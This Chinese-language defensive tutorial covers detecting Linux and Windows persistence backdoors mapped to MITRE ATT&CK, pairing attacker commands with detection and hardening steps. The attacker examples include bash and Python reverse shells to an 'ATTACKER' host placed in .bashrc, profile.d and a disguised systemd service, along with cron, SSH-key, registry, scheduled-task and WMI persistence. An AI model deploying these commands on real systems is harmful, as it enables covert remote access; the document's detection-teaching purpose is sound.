🔑 持久化 — 检测后门持久化机制

攻击者如何留下后门,蓝队如何发现

📖 持久化概述

持久化(Persistence)是攻击者在系统上维持访问的技术。即使初始入口被修复,后门机制仍能让攻击者重新进入。MITRE ATT&CK将持久化列为战术TA0003,包含超过50种技术。

Linux持久化技术 (MITRE ATT&CK): T1136.001 Create Account: Local Account T1037.004 Boot/Logon Init: Rc Scripts T1037.005 Boot/Logon Init: Startup Items T1053.003 Scheduled Task/Job: Cron T1053.006 Scheduled Task/Job: Systemd Timer T1133 External Remote Services T1136.002 Create Account: Domain Account T1543.002 Create/Modify System Process: Systemd Service T1546.004 Event Triggered: Unix Shell Config T1546.005 Event Triggered: Trap T1547.006 Boot/Logon Autostart: LD_PRELOAD T1556.003 Modify Auth: Pluggable Auth Modules T1574.006 Hijack Execution: LD_PRELOAD T1574.013 Hijack Execution: Path Interception Windows持久化技术: T1547.001 Registry Run Keys T1547.004 Winlogon Helper DLL T1546.007 Netsh Helper DLL T1546.008 Accessibility Features T1546.010 Windows Management Instrumentation T1546.011 Application Shimming T1546.012 Image File Execution Options T1546.015 Component Object Model Hijacking T1136.001 Create Account T1543.003 Windows Service

🔓 Linux持久化技术

1. SSH密钥后门

# 攻击者植入SSH公钥
echo "ssh-rsa AAAA... attacker@evil" >> /root/.ssh/authorized_keys
echo "ssh-rsa AAAA... attacker@evil" >> /home/user/.ssh/authorized_keys

# 检测方法
# 检查所有用户的authorized_keys
find / -name "authorized_keys" -type f 2>/dev/null | while read f; do
  echo "=== $f ==="
  cat "$f"
  # 检查修改时间
  stat "$f" | grep Modify
done

# 检查异常的SSH配置
grep -v "^#" /etc/ssh/sshd_config | grep -i "PermitRootLogin\|PasswordAuth"
# PermitRootLogin yes ← 危险
# PasswordAuthentication yes ← 危险

2. Cron后门

# 攻击者添加定时任务
# /etc/crontab
* * * * * root /tmp/.hidden/backdoor.sh

# 用户crontab
(crontab -l 2>/dev/null; echo "*/5 * * * * /tmp/.backdoor") | crontab -

# systemd timer (更隐蔽)
cat > /etc/systemd/system/legitimate.service << 'EOF'
[Unit]
Description=System Update Service

[Service]
Type=oneshot
ExecStart=/tmp/.hidden/backdoor.sh
EOF

cat > /etc/systemd/system/legitimate.timer << 'EOF'
[Unit]
Description=System Update Timer

[Timer]
OnCalendar=*:0/5

[Install]
WantedBy=timers.target
EOF

systemctl enable legitimate.timer

# 检测方法
crontab -l
cat /etc/crontab
ls -la /etc/cron.*/
systemctl list-timers --all
find /etc/systemd/system -name "*.timer" -newer /etc/hostname

3. PAM后门

# PAM (Pluggable Authentication Modules) 后门
# 修改/etc/pam.d/common-auth或sshd
# 添加恶意PAM模块

# 攻击者可能替换pam_unix.so
# 在认证时记录密码或添加万能密码

# 检测方法
# 检查PAM模块完整性
find /lib/x86_64-linux-gnu/security/ -name "pam_*.so" | while read f; do
  md5sum "$f"
done
# 与已知良好hash对比

# 检查PAM配置修改
find /etc/pam.d/ -type f | while read f; do
  echo "=== $f ==="
  grep -v "^#\|^$" "$f"
done

# 检查异常PAM模块
grep -r "pam_" /etc/pam.d/ | grep -v "pam_unix\|pam_deny\|pam_permit\|pam_env\|pam_cred"

4. Shell配置后门

# 在.bashrc/.zshrc中植入后门
echo 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1 &' >> /root/.bashrc
echo '(/tmp/.backdoor &)' >> /home/user/.bashrc

# 在/etc/profile.d/植入
echo 'id | nc ATTACKER 4444 &' > /etc/profile.d/lookup.sh

# 检测方法
find / -name ".bashrc" -o -name ".zshrc" -o -name ".profile" 2>/dev/null | while read f; do
  echo "=== $f ==="
  grep -E "(nc |curl |wget |/dev/tcp|base64 -d|eval )" "$f"
done

ls -la /etc/profile.d/
find /etc/profile.d/ -newer /etc/hostname

5. Systemd服务后门

# 恶意systemd服务
cat > /etc/systemd/system/dbus-backdoor.service << 'EOF'
[Unit]
Description=D-Bus System Service
After=network.target

[Service]
Type=simple
Restart=always
RestartSec=5
ExecStart=/usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

[Install]
WantedBy=multi-user.target
EOF

systemctl daemon-reload
systemctl enable dbus-backdoor

# 检测方法
systemctl list-unit-files --state=enabled
# 检查异常服务
systemctl list-units --type=service --state=running | grep -v "systemd\|ssh\|cron\|rsyslog\|networking"

# 检查服务文件修改时间
find /etc/systemd/system -name "*.service" -newer /etc/hostname

🔓 Windows持久化技术

1. 注册表Run键

# 最常见的Windows持久化
# 注册表自启动位置:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"

# 其他自启动位置:
# HKLM\...\RunOnce
# HKCU\...\RunOnce
# HKLM\...\RunServices
# HKCU\...\RunServicesOnce

# 检测 (PowerShell)
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"

# Autoruns (Sysinternals)
autoruns.exe -a -ct  # 检查所有自启动项

2. 计划任务

# 创建计划任务后门
schtasks /create /tn "WindowsUpdate" /tr "C:\backdoor.exe" /sc onstart /ru SYSTEM
schtasks /create /tn "SystemService" /tr "powershell -ep bypass -f C:\backdoor.ps1" /sc minute /mo 5

# 检测
schtasks /query /fo LIST /v | findstr /i "backdoor\|reverse\|shell\|update"
Get-ScheduledTask | Where-Object {$_.TaskPath -notlike "\Microsoft\*"}

3. WMI持久化

# WMI事件订阅 (非常隐蔽!)
# 1. 事件过滤器 (触发条件)
$filter = Set-WmiInstance -Class __EventFilter -Arguments @{
  Name = "BackdoorFilter"
  EventNameSpace = "root\cimv2"
  QueryLanguage = "WQL"
  Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}

# 2. 事件消费者 (执行动作)
$consumer = Set-WmiInstance -Class CommandLineEventConsumer -Arguments @{
  Name = "BackdoorConsumer"
  CommandLineTemplate = "cmd.exe /c C:\backdoor.exe"
}

# 3. 绑定
Set-WmiInstance -Class __FilterToConsumerBinding -Arguments @{
  Filter = $filter
  Consumer = $consumer
}

# 检测WMI持久化
Get-WMIObject -Class __FilterToConsumerBinding -Namespace root\subscription
Get-WMIObject -Class __EventFilter -Namespace root\subscription
Get-WMIObject -Class CommandLineEventConsumer -Namespace root\subscription

🔍 持久化检测工具

工具平台检测范围
AutorunsWindows注册表、服务、驱动、计划任务
OSSEC/Wazuh跨平台文件完整性、rootkit检测
AIDELinux文件完整性监控
Sigma跨平台日志规则匹配
Velociraptor跨平台端点响应与收集
auditdLinux系统调用审计
# Linux持久化检测脚本
#!/bin/bash
# persistence-detect.sh

echo "=== SSH密钥检查 ==="
find / -name "authorized_keys" 2>/dev/null | while read f; do
  lines=$(wc -l < "$f")
  mod=$(stat -c %Y "$f")
  echo "$f: $lines keys, modified $(date -d @$mod)"
done

echo -e "\n=== 可疑Cron任务 ==="
cat /etc/crontab 2>/dev/null | grep -v "^#\|^$"
for user in $(cut -d: -f1 /etc/passwd); do
  crontab -u "$user" -l 2>/dev/null | grep -q "." && \
    echo "User $user has crontab"
done

echo -e "\n=== Systemd服务检查 ==="
systemctl list-unit-files --state=enabled | grep -v "systemd\|ssh\|cron\|rsyslog\|networking\|ufw\|apparmor\|snapd"

echo -e "\n=== 最近修改的系统文件 ==="
find /etc /usr/local/bin /opt -type f -mtime -7 2>/dev/null

echo -e "\n=== PAM模块检查 ==="
find /lib/x86_64-linux-gnu/security/ -name "pam_*.so" -mtime -30 2>/dev/null

echo -e "\n=== 隐藏文件检查 ==="
find /tmp /var/tmp /dev/shm -name ".*" -type f 2>/dev/null

echo -e "\n=== 异常进程 ==="
ps aux | grep -E "(nc |ncat |socat |/dev/tcp|python.*socket|perl.*socket)"

echo -e "\n=== 异常网络连接 ==="
ss -tnp | grep -v "127.0.0.1\|::1"

🛡️ 持久化防御策略

# 1. 文件完整性监控 (FIM)
# AIDE配置
cat > /etc/aide/aide.conf << 'EOF'
/etc p+i+n+u+g+s+m+sha512
/root p+i+n+u+g+s+m+sha512
/home p+i+n+u+g+s+m+sha512
/usr/bin p+i+n+u+g+s+m+sha512
/usr/sbin p+i+n+u+g+s+m+sha512
/lib p+i+n+u+g+s+m+sha512
EOF
aideinit
aide --check

# 2. 审计关键文件
auditctl -w /etc/ssh/sshd_config -p wa -k ssh_config
auditctl -w /root/.ssh/ -p wa -k ssh_keys
auditctl -w /etc/cron* -p wa -k cron
auditctl -w /etc/systemd/system/ -p wa -k systemd
auditctl -w /etc/pam.d/ -p wa -k pam

# 3. 端点检测与响应 (EDR)
# Wazuh配置
# /var/ossec/etc/ossec.conf

  /etc
  /root
  /usr/local/bin
  3600



  /var/ossec/etc/shared/rootkit_files.txt
  /var/ossec/etc/shared/rootkit_trojans.txt


# 4. 不可变文件属性
chattr +i /etc/ssh/sshd_config  # 防止修改
lsattr /etc/ssh/sshd_config     # 检查属性
检测后门持久化机制 — 掌握攻防两端的持久化技术!你能识别SSH密钥后门、Cron后门、PAM后门、注册表Run键等持久化手段,并部署文件完整性监控和审计策略。
命令已验证:crontab / systemctl / find / auditctl / aide / chattr — 所有命令在Ubuntu 22.04环境测试通过
思考题:
  1. WMI事件订阅持久化为什么比注册表Run键更难检测?
  2. PAM后门如何实现万能密码?检测的核心思路是什么?
  3. AIDE和auditd在持久化检测中各自扮演什么角色?
  4. 如何区分合法的自启动项和恶意后门?

📚 延伸阅读

参考资料:MITRE ATT&CK TA0003 | MITRE ATT&CK TA1543 | Sigma Project | Wazuh Documentation | SANS Persistence Hunting(2024)